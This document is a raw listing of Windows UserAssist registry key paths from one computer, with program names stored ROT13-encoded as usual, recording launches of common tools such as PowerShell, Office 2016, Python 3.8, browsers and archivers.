HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Npprffvovyvgl\Fcrrpu Erpbtavgvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Punenpgre Znc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\qsethv.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Qvfx Pyrnahc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Erfbhepr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Vasbezngvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Flfgrz Erfgber.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre Ercbegf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Flfgrz Gbbyf\Jvaqbjf Rnfl Genafsre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\FuncrPbyyrpgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Gnoyrg CP\GnoGvc.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR (k86).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy VFR.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Npprffbevrf\Jvaqbjf CbjreFuryy\Jvaqbjf CbjreFuryy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzcbarag Freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Pbzchgre Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Qngn Fbheprf (BQOP).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Rirag Ivrjre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\vFPFV Vavgvngbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Zrzbel Qvntabfgvpf Gbby.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cresbeznapr Zbavgbe.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Cevag Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Frphevgl Pbasvthengvba Znantrzrag.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\freivprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Flfgrz Pbasvthengvba.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Gnfx Fpurqhyre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Nqzvavfgengvir Gbbyf\Jvaqbjf Sverjnyy jvgu Nqinaprq Frphevgl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\NhgbUbgxrl.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\NhgbUbgxrl\Pbaireg .nux gb .rkr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Obkfgnegre\Obkfgnegre Furyy.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Nobhg Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Purpx Sbe Hcqngrf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Wnin\Pbasvther Wnin.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Perngr Erpbirel Qvfp.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Znvagranapr\Erzbgr Nffvfgnapr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Qngnonfr Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Ynathntr Cersreraprf.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Bssvpr 2016 Hcybnq Pragre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fxlcr sbe Ohfvarff Erpbeqvat Znantre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Fcernqfurrg Pbzcner 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Qnfuobneq sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Zvpebfbsg Bssvpr 2016 Gbbyf\Gryrzrgel Ybt sbe Bssvpr 2016.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\CbjreFuryy\CbjreFuryy 7-cerivrj (k64).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\VQYR (Clguba 3.8 32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Znahnyf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\Clguba 3.8\Clguba 3.8 Zbqhyr Qbpf (32-ovg).yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{0139Q44R-6NSR-49S2-8690-3QNSPNR6SSO8}\JvaENE\JvaENE.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\P:\Hfref\hfre\Qrfxgbc\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Sversbk.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Tbbtyr Puebzr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Vagrearg Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Zvpebfbsg Rqtr.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Rkcybere.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count\{9R3995NO-1S9P-4S13-O827-48O24O6P7174}\GnfxOne\Jvaqbjf Zrqvn Cynlre.yax
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.VagreargRkcybere.Qrsnhyg
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{S38OS404-1Q43-42S2-9305-67QR0O28SP23}\rkcybere.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnCynlre32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Puebzr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\ZFRqtr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\qvfcynlfjvgpu.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pnyp.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.FgvpxlAbgrf
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FavccvatGbby.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfcnvag.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pzq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfCbjreFuryy\i1.0\CbjreFuryy_VFR.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\kcfepuij.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\abgrcnq.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JSF.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\pyrnazte.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ErzbgrQrfxgbc
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zntavsl.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.RKPRY.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.JVAJBEQ.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zfpbasvt.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{P1P6S8NP-40N3-0S5P-146S-65N9QP70OOO4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\freivprf.zfp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{PQ9RSP53-1NPR-RN00-530N-3RP179Q1971P}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\efgehv.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{N3R10OON-P2N1-R0S3-7P97-5Q5521119O40}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\308046O0NS4N39PO;CevingrOebjfvatNHZVQ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\BarQevir\BarQevir.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\aneengbe.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\bfx.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\rhqprqvg.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\JvaENE\JvaENE.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFNPPRFF.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R}\Nqbor\Npebong Ernqre QP\Ernqre\NpebEq32.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.ZrqvnPragre
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BARABGR.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.BHGYBBX.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.CBJRECAG.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ZFCHO.RKR.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{Q4N262QQ-PR44-Q105-S36O-9Q77N8PO65N4}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Bssvpr.ylap.rkr.15
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\JvaqbjfNalgvzrHctenqrHV.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\QIQ Znxre\QIQZnxre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\7-Mvc\7mSZ.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{6Q809377-6NS0-444O-8957-N3773S02200R}\Pbzzba Svyrf\Zvpebfbsg Funerq\Vax\zvc.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.NhgbTrarengrq.{NN198O3P-PQ8P-7QR1-98Q1-O460S637193O}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\ArgCebw.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\FbhaqErpbeqre.rkr
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\zboflap.rkr
